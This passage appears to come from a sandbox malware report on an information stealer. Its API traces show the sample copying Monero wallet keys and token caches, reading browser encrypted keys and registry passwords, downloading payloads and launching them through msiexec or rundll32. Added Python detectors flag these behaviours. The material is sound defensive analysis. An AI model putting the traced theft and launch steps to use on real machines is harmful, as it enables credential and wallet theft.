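     "path": r"C:\Users\u\AppData\Local\.IdentityService\msal.cache"},
    {"pid": 4242, "image": "file.exe", "op": "copy",
     "path": r"C:\Users\u\AppData\Roaming\Monero\wallet.keys"},
    {"pid": 4242, "image": "file.exe", "op": "delete",
     "path": r"C:\Users\u\AppData\Local\Temp\msal.cache"},
]

if __name__ == "__main__":
    for pid, rec in find_harvesters(EVENTS).items():
        print(f"pid {pid} ({rec['image']}): {len(rec['stores'])} stores, "
              f"copied {len(rec['copied'])} files")
```

The delete of the staging copy under Temp is deliberately not matched: the report shows CopyFileA followed by DeleteFileA inside the same subcall, so the copy-out, not the cleanup, is the event worth alerting on.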
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0069906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 29998bb1082106a528458819ae243223b2866c2c5e3afb183c3698b94150c29a
                              • Instruction ID: b7917b030109f85454c69e62425d2c74da53e66283b06753eeff3831c5abc2df
                              • Opcode Fuzzy Hash: 29998bb1082106a528458819ae243223b2866c2c5e3afb183c3698b94150c29a
                              • Instruction Fuzzy Hash: 0D71CAB5910208ABDB08EBE4DD89FEEB7BDFB48704F108518F515EB690DB34A905CB61
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 006931C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0069335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 006934EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: a0e239f8fcd2ac92abe91e76dd30eb0eb593b512bd29506129933a608acba187
                              • Instruction ID: 6e3e8f0b1fa26100ff6e87184840aaefff08e8e2ad76550b821645d7392c3dd9
                              • Opcode Fuzzy Hash: a0e239f8fcd2ac92abe91e76dd30eb0eb593b512bd29506129933a608acba187
                              • Instruction Fuzzy Hash: 48120A718101189ADF49FBE0CD92EEEB7BEAF14300F50415DE50666591EF302B4ACFAA
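The strings of the function above (C:\Windows\system32\msiexec.exe, /i ", /passive, C:\Windows\system32\rundll32.exe, .dll, .msi) together with the three ShellExecuteEx calls show the sample launching a downloaded payload either as an MSI package through msiexec or as a DLL through rundll32. The classifier below is an added example written for this page, not code from the report or the sample: it parses process-creation command lines for those two launch shapes, extracts the payload path and flags payloads that live outside the Program Files and Windows directories. The event format, the parent names, the command lines in EVENTS and the trusted-directory heuristic are constructed assumptions.

```python
"""
Added example (not part of the Joe Sandbox report or the analysed sample):
recognise the msiexec /i "<payload>" /passive and rundll32 "<payload>.dll"
launch patterns and flag payloads outside trusted install directories.
"""
import re

# One command-line argument: either a quoted string or a run of non-spaces.
ARG = r'(?:"([^"]+)"|(\S+))'

MSIEXEC_RE = re.compile(
    r'^"?(?:[a-z]:\\windows\\system32\\)?msiexec(?:\.exe)?"?\s+/i\s+' + ARG + r'(.*)$',
    re.I)
RUNDLL_RE = re.compile(
    r'^"?(?:[a-z]:\\windows\\system32\\)?rundll32(?:\.exe)?"?\s+'
    r'(?:"([^"]+)"|([^,\s]+))\s*,?\s*(\S*)',
    re.I)

# Heuristic (assumption): payloads under these roots are treated as installed
# software; anything else (Temp, AppData, Downloads, ...) is reported.
TRUSTED_ROOTS = (r"c:\program files", r"c:\windows")


def classify_launch(cmdline):
    """
    Return a dict describing the launch, or None if the command line is
    neither an msiexec /i install nor a rundll32 DLL load.
    """
    m = MSIEXEC_RE.match(cmdline)
    if m:
        payload = m.group(1) or m.group(2)
        return {"kind": "msi", "payload": payload,
                "passive": "/passive" in m.group(3).lower()}
    m = RUNDLL_RE.match(cmdline)
    if m:
        payload = m.group(1) or m.group(2)
        return {"kind": "dll", "payload": payload, "export": m.group(3)}
    return None


def payload_is_untrusted(path):
    """True when the payload path does not start with a trusted root."""
    p = path.lower()
    return not any(p.startswith(root) for root in TRUSTED_ROOTS)


def find_suspicious_launches(events):
    """
    events: iterable of dicts with keys parent, cmdline (format is an assumption).
    Returns the launches whose payload lies outside TRUSTED_ROOTS, with the
    parent image attached so an analyst can pivot to the dropper.
    """
    hits = []
    for ev in events:
        info = classify_launch(ev["cmdline"])
        if info and payload_is_untrusted(info["payload"]):
            hits.append({"parent": ev["parent"], **info})
    return hits


# Constructed sample events (not from the report): the first two mimic the
# traced behaviour, the last two are benign uses of the same binaries.
EVENTS = [
    {"parent": "file.exe",
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\u\AppData\Local\Temp\update.msi" /passive'},
    {"parent": "file.exe",
     "cmdline": r'C:\Windows\system32\rundll32.exe "C:\Users\u\AppData\Local\Temp\helper.dll" , Start'},
    {"parent": "services.exe",
     "cmdline": r'C:\Windows\system32\msiexec.exe /V'},
    {"parent": "explorer.exe",
     "cmdline": r'"C:\Windows\system32\msiexec.exe" /i "C:\Program Files\Vendor\setup.msi"'},
]

if __name__ == "__main__":
    for hit in find_suspicious_launches(EVENTS):
        print(f"{hit['parent']} -> {hit['kind']} payload {hit['payload']}")
```

The parent image is the field to pivot on: msiexec started by services.exe is the Windows Installer service, whereas msiexec or rundll32 started by an unsigned executable with a payload under the user's profile matches the behaviour traced here.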
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 00686280: InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                                • Part of subcall function 00686280: StrCmpCA.SHLWAPI(?,0148E838), ref: 00686303
                                • Part of subcall function 00686280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                                • Part of subcall function 00686280: HttpOpenRequestA.WININET(00000000,GET,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00686385
                                • Part of subcall function 00686280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                                • Part of subcall function 00686280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695318
                              • lstrlen.KERNEL32(00000000), ref: 0069532F
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00695364
                              • lstrlen.KERNEL32(00000000), ref: 00695383
                              • lstrlen.KERNEL32(00000000), ref: 006953AE
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 5b602e37868a6b88f2cdd36d6f3596fde1c5a0465ad4f990caeedcef202edebc
                              • Instruction ID: c6a5f7d302daa504ead4f7fb43d2d0a59a422babd9e3a0be752854b48decbc6f
                              • Opcode Fuzzy Hash: 5b602e37868a6b88f2cdd36d6f3596fde1c5a0465ad4f990caeedcef202edebc
                              • Instruction Fuzzy Hash: A751EE709211489BDF58FFA0C996AED77BEAF11304F50401CF80A5B992DF346B46CB96
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 4c20b01a37fa20038019d7692e9c955c7ff3dece9c2f34556b93b35d874943fd
                              • Instruction ID: ec90d2d9eaa3b435079f5193e517ef74ad4aec75c11ddcdddfbb7036d1cf17c3
                              • Opcode Fuzzy Hash: 4c20b01a37fa20038019d7692e9c955c7ff3dece9c2f34556b93b35d874943fd
                              • Instruction Fuzzy Hash: 0CC1B4B590011D9BCF58EFA0DC89FEA73BEBF54304F10449DE40AA7641DA70AA85CFA5
                              APIs
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 006942EC
                              • lstrcat.KERNEL32(?,0148E5F0), ref: 0069430B
                              • lstrcat.KERNEL32(?,?), ref: 0069431F
                              • lstrcat.KERNEL32(?,0148D458), ref: 00694333
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 00698D90: GetFileAttributesA.KERNEL32(00000000,?,00681B54,?,?,006A564C,?,?,006A0E1F), ref: 00698D9F
                                • Part of subcall function 00689CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00689D39
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                                • Part of subcall function 006993C0: GlobalAlloc.KERNEL32(00000000,006943DD,006943DD), ref: 006993D3
                              • StrStrA.SHLWAPI(?,0148E548), ref: 006943F3
                              • GlobalFree.KERNEL32(?), ref: 00694512
                                • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                                • Part of subcall function 00689AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                                • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                                • Part of subcall function 00689AC0: LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 006944A3
                              • StrCmpCA.SHLWAPI(?,006A08D1), ref: 006944C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 006944D2
                              • lstrcat.KERNEL32(00000000,?), ref: 006944E5
                              • lstrcat.KERNEL32(00000000,006A0FB8), ref: 006944F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: c85ad2fe509f3a9ffd37bf362c7cb5daef36f17eb1c42fc801cb139655339cd4
                              • Instruction ID: 5fdce2f312b23a2341599b1e7a58186a371a690ba903138efe444d4327c048ec
                              • Opcode Fuzzy Hash: c85ad2fe509f3a9ffd37bf362c7cb5daef36f17eb1c42fc801cb139655339cd4
                              • Instruction Fuzzy Hash: F17122B6900208ABDF54EBE4DC86FEE73BEBB48304F044598F60597181EA35DB45CBA5
                              APIs
                                • Part of subcall function 006812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                                • Part of subcall function 006812A0: RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                                • Part of subcall function 006812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                                • Part of subcall function 006812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                                • Part of subcall function 006812A0: RegCloseKey.ADVAPI32(?), ref: 006812FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0068134F
                              • lstrlen.KERNEL32(?), ref: 0068135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00681377
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00681465
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 006814EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: b78886056738ad4ecd0d63770561e0394b749630219c8fc963ae19306ff30840
                              • Instruction ID: 36d7a8b16930d9f4dde8a97203ef0633f180337665a348b61a92c0ae188cf90d
                              • Opcode Fuzzy Hash: b78886056738ad4ecd0d63770561e0394b749630219c8fc963ae19306ff30840
                              • Instruction Fuzzy Hash: 9B5133B19501185BCB55FBA0DD92FED73BEAF54300F40419CB60A66481EE706B85CFAA
                              APIs
                                • Part of subcall function 006872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
                                • Part of subcall function 006872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
                                • Part of subcall function 006872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
                                • Part of subcall function 006872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00687452
                                • Part of subcall function 006872D0: HeapFree.KERNEL32(00000000), ref: 00687459
                              • lstrcat.KERNEL32(00000000,006A17FC), ref: 00687606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00687648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0068765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0068768F
                              • lstrcat.KERNEL32(00000000,006A1804), ref: 006876A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 006876D3
                              • lstrcat.KERNEL32(00000000,006A1808), ref: 006876ED
                              • task.LIBCPMTD ref: 006876FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 1cd5b8b8600cc3dad25fa5869734a3c9993062d6d62c4f7878163db66ddaf8e4
                              • Instruction ID: f51693d4b855e5d0c9628e1b7c94bfd501517eb267a1faa20cb030b0aeac4a35
                              • Opcode Fuzzy Hash: 1cd5b8b8600cc3dad25fa5869734a3c9993062d6d62c4f7878163db66ddaf8e4
                              • Instruction Fuzzy Hash: 76313872900109DFCB48FBA4DC99DFE777AFB55305B244218F102A7290DE34E946CBA6
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0148E3F8,00000000,?,006A0E2C,00000000,?,00000000), ref: 00698130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00698137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00698158
                              • __aulldiv.LIBCMT ref: 00698172
                              • __aulldiv.LIBCMT ref: 00698180
                              • wsprintfA.USER32 ref: 006981AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 33351d512d1a857ea09840acd349c95a2d9fb921c0afed6b864ac841f9537785
                              • Instruction ID: 9daf2dba117d18fe385431c7dd56eb21a3f8768d4a87b5b4635ea4756dc59528
                              • Opcode Fuzzy Hash: 33351d512d1a857ea09840acd349c95a2d9fb921c0afed6b864ac841f9537785
                              • Instruction Fuzzy Hash: 0C2138B1E44208ABDB04DFD4CD4AFAEB7BDFB45B04F104219F605BB680C77969018BA9
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                                • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              • InternetOpenA.WININET(006A0DF7,00000001,00000000,00000000,00000000), ref: 0068610F
                              • StrCmpCA.SHLWAPI(?,0148E838), ref: 00686147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0068618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006861B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 006861DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0068620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00686249
                              • InternetCloseHandle.WININET(?), ref: 00686253
                              • InternetCloseHandle.WININET(00000000), ref: 00686260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
